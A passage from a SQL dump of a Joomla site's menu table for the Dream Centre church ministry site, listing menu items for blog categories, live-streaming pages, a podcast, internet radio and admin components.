(760, 'mainmenu', 'Child Item', 'child-item-8', '', 'resources/mega-menu/child-item-8', '', 'url', 0, 752, 3, 0, 0, '0000-00-00 00:00:00', 0, 1, '', 0, '{\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"icemega_subtitle\":\"\",\"icemega_cols\":\"1\",\"icemega_width\":\"\",\"icemega_colwidth\":\"\",\"icemega_cols_items\":\"\",\"icemega_subtype\":\"menu\"}', 93, 94, 0, '*', 0),
(761, 'mainmenu', 'Child Item', 'child-item-9', '', 'resources/mega-menu/child-item-7/child-item-9', '', 'url', 0, 759, 4, 0, 0, '0000-00-00 00:00:00', 0, 1, '', 0, '{\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"icemega_subtitle\":\"\",\"icemega_cols\":\"1\",\"icemega_width\":\"\",\"icemega_colwidth\":\"\",\"icemega_cols_items\":\"\",\"icemega_subtype\":\"menu\"}', 84, 85, 0, '*', 0),
(762, 'mainmenu', 'Child Item', 'child-item-10', '', 'resources/mega-menu/child-item-7/child-item-10', '', 'url', 0, 759, 4, 0, 0, '0000-00-00 00:00:00', 0, 1, '', 0, '{\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"icemega_subtitle\":\"\",\"icemega_cols\":\"1\",\"icemega_width\":\"\",\"icemega_colwidth\":\"\",\"icemega_cols_items\":\"\",\"icemega_subtype\":\"menu\"}', 86, 87, 0, '*', 0),
(763, 'mainmenu', 'Child Item', 'child-item-11', '', 'resources/mega-menu/child-item-7/child-item-11', '', 'url', 0, 759, 4, 0, 0, '0000-00-00 00:00:00', 0, 1, '', 0, '{\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"icemega_subtitle\":\"\",\"icemega_cols\":\"1\",\"icemega_width\":\"\",\"icemega_colwidth\":\"\",\"icemega_cols_items\":\"\",\"icemega_subtype\":\"menu\"}', 88, 89, 0, '*', 0),
(764, 'mainmenu', 'Child Item', 'child-item-12', '', 'resources/mega-menu/child-item-7/child-item-12', '', 'url', 0, 759, 4, 0, 0, '0000-00-00 00:00:00', 0, 1, '', 0, '{\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"icemega_subtitle\":\"\",\"icemega_cols\":\"1\",\"icemega_width\":\"\",\"icemega_colwidth\":\"\",\"icemega_cols_items\":\"\",\"icemega_subtype\":\"menu\"}', 90, 91, 0, '*', 0),
(765, 'mainmenu', 'Module Menu', 'module-menu', '', 'resources/mega-menu/module-menu', '', 'separator', 0, 752, 3, 0, 0, '0000-00-00 00:00:00', 0, 1, '', 0, '{\"menu_image\":\"\",\"menu_text\":1,\"icemega_subtitle\":\"\",\"icemega_cols\":\"1\",\"icemega_width\":\"\",\"icemega_colwidth\":\"\",\"icemega_cols_items\":\"\",\"icemega_subtype\":\"mod\",\"icemega_modules\":[\"401\"]}', 95, 96, 0, '*', 0),
(766, 'mainmenu', 'Healing', 'healing', '', 'resources/blog/healing', 'index.php?option=com_k2&view=itemlist&layout=category&task=category&id=1', 'component', 0, 622, 3, 10279, 0, '0000-00-00 00:00:00', 0, 1, ' ', 0, '{\"categories\":[\"1\"],\"singleCatOrdering\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"menu_show\":1,\"page_title\":\"\",\"show_page_heading\":\"0\",\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0,\"icemega_subtitle\":\"\",\"icemega_cols\":\"1\",\"icemega_width\":\"\",\"icemega_colwidth\":\"\",\"icemega_cols_items\":\"\",\"icemega_subtype\":\"menu\"}', 45, 46, 0, '*', 0);
INSERT INTO `y57u5_menu` (`id`, `menutype`, `title`, `alias`, `note`, `path`, `link`, `type`, `published`, `parent_id`, `level`, `component_id`, `checked_out`, `checked_out_time`, `browserNav`, `access`, `img`, `template_style_id`, `params`, `lft`, `rgt`, `home`, `language`, `client_id`) VALUES
(767, 'mainmenu', 'Faith', 'faith', '', 'resources/blog/faith', 'index.php?option=com_k2&view=itemlist&layout=category&task=category&id=2', 'component', 0, 622, 3, 10279, 0, '0000-00-00 00:00:00', 0, 1, ' ', 0, '{\"categories\":[\"2\"],\"singleCatOrdering\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"menu_show\":1,\"page_title\":\"\",\"show_page_heading\":\"0\",\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0,\"icemega_subtitle\":\"\",\"icemega_cols\":\"1\",\"icemega_width\":\"\",\"icemega_colwidth\":\"\",\"icemega_cols_items\":\"\",\"icemega_subtype\":\"menu\"}', 47, 48, 0, '*', 0),
(768, 'mainmenu', 'Courtship & Marriage', 'courtship-marriage', '', 'resources/blog/courtship-marriage', 'index.php?option=com_k2&view=itemlist&layout=category&task=category&id=3', 'component', 0, 622, 3, 10279, 0, '0000-00-00 00:00:00', 0, 1, ' ', 0, '{\"categories\":[\"3\"],\"singleCatOrdering\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"menu_show\":1,\"page_title\":\"\",\"show_page_heading\":\"0\",\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0,\"icemega_subtitle\":\"\",\"icemega_cols\":\"1\",\"icemega_width\":\"\",\"icemega_colwidth\":\"\",\"icemega_cols_items\":\"\",\"icemega_subtype\":\"menu\"}', 49, 50, 0, '*', 0),
(769, 'mainmenu', 'Finances', 'finances', '', 'resources/blog/finances', 'index.php?option=com_k2&view=itemlist&layout=category&task=category&id=4', 'component', 0, 622, 3, 10279, 0, '0000-00-00 00:00:00', 0, 1, ' ', 0, '{\"categories\":[\"4\"],\"singleCatOrdering\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"menu_show\":1,\"page_title\":\"\",\"show_page_heading\":\"0\",\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0,\"icemega_subtitle\":\"\",\"icemega_cols\":\"1\",\"icemega_width\":\"\",\"icemega_colwidth\":\"\",\"icemega_cols_items\":\"\",\"icemega_subtype\":\"menu\"}', 51, 52, 0, '*', 0),
(770, 'mainmenu', 'Father\'s Heart', 'father-s-heart', '', 'resources/blog/father-s-heart', 'index.php?option=com_k2&view=itemlist&layout=category&task=category&id=5', 'component', 0, 622, 3, 10279, 0, '0000-00-00 00:00:00', 0, 1, ' ', 0, '{\"categories\":[\"5\"],\"singleCatOrdering\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"menu_show\":1,\"page_title\":\"\",\"show_page_heading\":\"0\",\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0,\"icemega_subtitle\":\"\",\"icemega_cols\":\"1\",\"icemega_width\":\"\",\"icemega_colwidth\":\"\",\"icemega_cols_items\":\"\",\"icemega_subtype\":\"menu\"}', 53, 54, 0, '*', 0),
(771, 'mainmenu', 'Icon Fonts', 'icon-fonts', '', 'resources/icon-fonts', 'index.php?option=com_content&view=article&id=95', 'component', 0, 102, 2, 22, 0, '0000-00-00 00:00:00', 0, 1, '', 0, '{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_vote\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"show_tags\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"page_title\":\"\",\"show_page_heading\":0,\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0,\"icemega_subtitle\":\"\",\"icemega_cols\":\"1\",\"icemega_width\":\"\",\"icemega_colwidth\":\"\",\"icemega_cols_items\":\"\",\"icemega_subtype\":\"menu\"}', 68, 69, 0, '*', 0),
(772, 'mainmenu', 'Color Styles', 'color-styles', '', 'resources/color-styles', 'index.php?option=com_content&view=article&id=96', 'component', 0, 102, 2, 22, 0, '0000-00-00 00:00:00', 0, 1, ' ', 0, '{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_vote\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"show_tags\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"page_title\":\"\",\"show_page_heading\":\"0\",\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0,\"icemega_subtitle\":\"\",\"icemega_cols\":\"1\",\"icemega_width\":\"\",\"icemega_colwidth\":\"\",\"icemega_cols_items\":\"\",\"icemega_subtype\":\"menu\"}', 102, 103, 0, '*', 0),
(773, 'mainmenu', 'Admin Panel', 'admin-panel', '', 'resources/admin-panel', 'index.php?option=com_content&view=article&id=97', 'component', 0, 102, 2, 22, 0, '0000-00-00 00:00:00', 0, 1, '', 0, '{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_vote\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"show_tags\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"page_title\":\"\",\"show_page_heading\":0,\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0,\"icemega_subtitle\":\"\",\"icemega_cols\":\"1\",\"icemega_width\":\"\",\"icemega_colwidth\":\"\",\"icemega_cols_items\":\"\",\"icemega_subtype\":\"menu\"}', 104, 105, 0, '*', 0),
(774, 'mainmenu', 'Latest Items by Users', 'latest-items-by-users', '', 'resources/blog/latest-items-by-users', 'index.php?option=com_k2&view=latest&layout=latest', 'component', 0, 622, 3, 10279, 0, '0000-00-00 00:00:00', 0, 1, '', 0, '{\"theme\":\"default\",\"source\":\"1\",\"latestItemsCols\":\"2\",\"latestItemsLimit\":\"3\",\"latestItemsDisplayEffect\":\"all\",\"userIDs\":[\"42\"],\"userName\":\"1\",\"userImage\":\"1\",\"userDescription\":\"1\",\"userURL\":\"1\",\"userEmail\":\"0\",\"userFeed\":\"1\",\"categoryIDs\":[\"4\",\"3\",\"1\",\"2\",\"5\"],\"categoryTitle\":\"0\",\"categoryDescription\":\"0\",\"categoryImage\":\"0\",\"categoryFeed\":\"0\",\"latestItemTitle\":\"1\",\"latestItemTitleLinked\":\"1\",\"latestItemDateCreated\":\"1\",\"latestItemImage\":\"1\",\"latestItemImageSize\":\"Medium\",\"latestItemVideo\":\"1\",\"latestItemVideoWidth\":\"\",\"latestItemVideoHeight\":\"\",\"latestItemAudioWidth\":\"\",\"latestItemAudioHeight\":\"\",\"latestItemVideoAutoPlay\":\"0\",\"latestItemIntroText\":\"1\",\"latestItemCategory\":\"1\",\"latestItemTags\":\"0\",\"latestItemReadMore\":\"1\",\"latestItemCommentsAnchor\":\"1\",\"feedLink\":\"1\",\"latestItemK2Plugins\":\"0\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"page_title\":\"\",\"show_page_heading\":0,\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0,\"icemega_subtitle\":\"\",\"icemega_cols\":\"1\",\"icemega_width\":\"\",\"icemega_colwidth\":\"\",\"icemega_cols_items\":\"\",\"icemega_subtype\":\"menu\"}', 41, 42, 0, '*', 0),
(775, 'mainmenu', 'Latest Items by Category', 'latest-items-by-category', '', 'resources/blog/latest-items-by-category', 'index.php?option=com_k2&view=latest&layout=latest', 'component', 0, 622, 3, 10279, 0, '0000-00-00 00:00:00', 0, 1, '', 0, '{\"theme\":\"default\",\"source\":\"1\",\"latestItemsCols\":\"2\",\"latestItemsLimit\":\"3\",\"latestItemsDisplayEffect\":\"all\",\"userIDs\":[\"42\"],\"userName\":\"1\",\"userImage\":\"1\",\"userDescription\":\"1\",\"userURL\":\"1\",\"userEmail\":\"0\",\"userFeed\":\"1\",\"categoryIDs\":[\"4\",\"3\",\"1\",\"2\",\"5\"],\"categoryTitle\":\"0\",\"categoryDescription\":\"0\",\"categoryImage\":\"0\",\"categoryFeed\":\"0\",\"latestItemTitle\":\"1\",\"latestItemTitleLinked\":\"1\",\"latestItemDateCreated\":\"1\",\"latestItemImage\":\"1\",\"latestItemImageSize\":\"Medium\",\"latestItemVideo\":\"1\",\"latestItemVideoWidth\":\"\",\"latestItemVideoHeight\":\"\",\"latestItemAudioWidth\":\"\",\"latestItemAudioHeight\":\"\",\"latestItemVideoAutoPlay\":\"0\",\"latestItemIntroText\":\"1\",\"latestItemCategory\":\"1\",\"latestItemTags\":\"0\",\"latestItemReadMore\":\"1\",\"latestItemCommentsAnchor\":\"1\",\"feedLink\":\"1\",\"latestItemK2Plugins\":\"0\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"page_title\":\"\",\"show_page_heading\":0,\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0,\"icemega_subtitle\":\"\",\"icemega_cols\":\"1\",\"icemega_width\":\"\",\"icemega_colwidth\":\"\",\"icemega_cols_items\":\"\",\"icemega_subtype\":\"menu\"}', 43, 44, 0, '*', 0),
(776, 'vertical-menu', 'Admin Panel', 'side-admin-panel', '', 'side-features/side-admin-panel', 'index.php?Itemid=', 'alias', 0, 630, 2, 0, 0, '0000-00-00 00:00:00', 0, 1, '', 0, '{\"aliasoptions\":\"773\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"icemega_subtitle\":\"\",\"icemega_cols\":\"1\",\"icemega_width\":\"\",\"icemega_colwidth\":\"\",\"icemega_cols_items\":\"\",\"icemega_subtype\":\"menu\"}', 334, 335, 0, '*', 0),
(778, 'mainmenu', 'RTL Language Ready', 'rtl-language-ready', '', 'resources/rtl-language-ready', 'index.php?option=com_content&view=article&id=100', 'component', 0, 102, 2, 22, 0, '0000-00-00 00:00:00', 0, 1, '', 0, '{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_vote\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"show_tags\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"page_title\":\"\",\"show_page_heading\":0,\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0,\"icemega_subtitle\":\"\",\"icemega_cols\":\"1\",\"icemega_width\":\"\",\"icemega_colwidth\":\"\",\"icemega_cols_items\":\"\",\"icemega_subtype\":\"menu\"}', 108, 109, 0, '*', 0),
(803, 'main', 'COM_ROKCANDY', 'com-rokcandy', '', 'com-rokcandy', 'index.php?option=com_rokcandy', 'component', 1, 1, 1, 10350, 0, '0000-00-00 00:00:00', 0, 1, 'components/com_rokcandy/assets/rokcandy-icon-16.png', 0, '', 349, 354, 0, '', 1),
(804, 'main', 'COM_ROKCANDY_SUBMENU_MACROS', 'com-rokcandy-submenu-macros', '', 'com-rokcandy/com-rokcandy-submenu-macros', 'index.php?option=com_rokcandy', 'component', 1, 803, 2, 10350, 0, '0000-00-00 00:00:00', 0, 1, 'components/com_rokcandy/assets/rokcandy-icon-16.png', 0, '', 350, 351, 0, '', 1),
(805, 'main', 'COM_ROKCANDY_SUBMENU_CATEGORIES', 'com-rokcandy-submenu-categories', '', 'com-rokcandy/com-rokcandy-submenu-categories', 'index.php?option=com_categories&extension=com_rokcandy', 'component', 1, 803, 2, 10350, 0, '0000-00-00 00:00:00', 0, 1, 'components/com_rokcandy/assets/icon-16-category.png', 0, '', 352, 353, 0, '', 1),
(867, 'bottommenu', 'test', '2015-08-31-09-19-16', '', 'live-blog/2015-08-31-09-19-16', '#', 'url', -2, 109, 2, 0, 0, '0000-00-00 00:00:00', 0, 1, '', 0, '{\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"icemega_subtitle\":\"\",\"icemega_cols\":\"1\",\"icemega_width\":\"\",\"icemega_colwidth\":\"\",\"icemega_cols_items\":\"\",\"icemega_subtype\":\"menu\",\"icemega_modules\":[],\"icemega_positions\":[]}', 240, 241, 0, '*', 0),
(976, 'main', 'com_joomlaupdate', 'com-joomlaupdate', '', 'com-joomlaupdate', 'index.php?option=com_joomlaupdate', 'component', 1, 1, 1, 10136, 0, '0000-00-00 00:00:00', 0, 1, 'class:joomlaupdate', 0, '{}', 357, 358, 0, '', 1),
(988, 'main', 'COM_WIDGETKIT', 'com-widgetkit', '', 'com-widgetkit', 'index.php?option=com_widgetkit', 'component', 1, 1, 1, 10056, 0, '0000-00-00 00:00:00', 0, 1, 'components/com_widgetkit/images/widgetkit_16.png', 0, '{}', 359, 360, 0, '', 1),
(991, 'mainmenu', 'Dream Centre Ordained Pastors', 'ordained', '', 'about-us/ordained', 'index.php?option=com_content&view=article&id=101', 'component', 0, 132, 2, 22, 0, '0000-00-00 00:00:00', 0, 1, ' ', 0, '{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"info_block_show_title\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_vote\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"show_tags\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"menu_show\":1,\"page_title\":\"\",\"show_page_heading\":\"\",\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0,\"icemega_subtitle\":\"\",\"icemega_cols\":\"1\",\"icemega_width\":\"\",\"icemega_colwidth\":\"\",\"icemega_cols_items\":\"\",\"icemega_subtype\":\"menu\"}', 24, 25, 0, '*', 0),
(992, 'mainmenu', 'Dream Centre Ordained Pastors', 'ordained-pastor', '', 'about-us/ordained-pastor', 'index.php?option=com_content&view=article&id=103', 'component', -2, 132, 2, 22, 0, '0000-00-00 00:00:00', 0, 1, ' ', 0, '{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"info_block_show_title\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_vote\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"show_tags\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"menu_show\":1,\"page_title\":\"\",\"show_page_heading\":\"0\",\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0,\"icemega_subtitle\":\"\",\"icemega_cols\":\"1\",\"icemega_width\":\"\",\"icemega_colwidth\":\"\",\"icemega_cols_items\":\"\",\"icemega_subtype\":\"menu\"}', 18, 19, 0, '*', 0),
(993, 'mainmenu', 'Our Belief', 'our-belief', '', 'about-us/our-belief', 'index.php?option=com_content&view=article&id=107', 'component', 1, 132, 2, 22, 0, '0000-00-00 00:00:00', 0, 1, ' ', 0, '{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"info_block_show_title\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_vote\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"show_tags\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"menu_show\":1,\"page_title\":\"\",\"show_page_heading\":\"0\",\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0,\"icemega_subtitle\":\"\",\"icemega_cols\":\"1\",\"icemega_width\":\"\",\"icemega_colwidth\":\"\",\"icemega_cols_items\":\"\",\"icemega_subtype\":\"menu\"}', 16, 17, 0, '*', 0),
(994, 'main', 'COM_JUMI_MENU', 'com-jumi-menu', '', 'com-jumi-menu', 'index.php?option=com_jumi', 'component', 1, 1, 1, 10463, 0, '0000-00-00 00:00:00', 0, 1, 'components/com_jumi/images/jumi.png', 0, '{}', 361, 362, 0, '', 1),
(995, 'live-streaming', 'Youtube Live', 'youtube', '', 'youtube', 'index.php?option=com_content&view=article&id=108', 'component', 1, 1, 1, 22, 0, '0000-00-00 00:00:00', 0, 1, ' ', 0, '{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"info_block_show_title\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_vote\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"show_tags\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"menu_show\":1,\"page_title\":\"\",\"show_page_heading\":\"\",\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0,\"icemega_subtitle\":\"\",\"icemega_cols\":\"1\",\"icemega_width\":\"\",\"icemega_colwidth\":\"\",\"icemega_cols_items\":\"\",\"icemega_subtype\":\"menu\"}', 363, 364, 0, '*', 0),
(996, 'live-streaming', 'Facebook Live', 'facebook', '', 'facebook', 'index.php?option=com_content&view=article&id=110', 'component', 1, 1, 1, 22, 0, '0000-00-00 00:00:00', 0, 1, ' ', 0, '{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"info_block_show_title\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_associations\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_vote\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"show_tags\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_image_css\":\"\",\"menu_text\":1,\"menu_show\":1,\"page_title\":\"\",\"show_page_heading\":\"\",\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0,\"icemega_subtitle\":\"\",\"icemega_cols\":\"1\",\"icemega_width\":\"\",\"icemega_colwidth\":\"\",\"icemega_cols_items\":\"\",\"icemega_subtype\":\"menu\"}', 365, 366, 0, '*', 0),
(997, 'live-streaming', 'Periscope Live', 'periscope', '', 'periscope', 'index.php?option=com_content&view=article&id=109', 'component', 1, 1, 1, 22, 196, '2019-08-03 17:32:45', 0, 1, ' ', 0, '{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"info_block_show_title\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_vote\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"show_tags\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"menu_show\":1,\"page_title\":\"\",\"show_page_heading\":\"\",\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0,\"icemega_subtitle\":\"\",\"icemega_cols\":\"1\",\"icemega_width\":\"\",\"icemega_colwidth\":\"\",\"icemega_cols_items\":\"\",\"icemega_subtype\":\"menu\"}', 367, 368, 0, '*', 0),
(998, 'mainmenu', 'Internet Radio', 'iradio', '', 'resources/iradio', 'http://dciradio.org', 'url', 1, 102, 2, 0, 0, '0000-00-00 00:00:00', 1, 1, ' ', 0, '{\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu-anchor_rel\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"menu_show\":1,\"icemega_subtitle\":\"\",\"icemega_cols\":\"1\",\"icemega_width\":\"\",\"icemega_colwidth\":\"\",\"icemega_cols_items\":\"\",\"icemega_subtype\":\"menu\"}', 30, 31, 0, '*', 0),
(999, 'mainmenu', 'Podcast ', 'pod', '', 'resources/pod', 'index.php?option=com_content&view=article&id=111', 'component', 1, 102, 2, 22, 0, '0000-00-00 00:00:00', 0, 1, ' ', 0, '{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"info_block_show_title\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_vote\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"show_tags\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"menu_show\":1,\"page_title\":\"\",\"show_page_heading\":\"\",\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0,\"icemega_subtitle\":\"\",\"icemega_cols\":\"1\",\"icemega_width\":\"\",\"icemega_colwidth\":\"\",\"icemega_cols_items\":\"\",\"icemega_subtype\":\"menu\"}', 56, 57, 0, '*', 0),
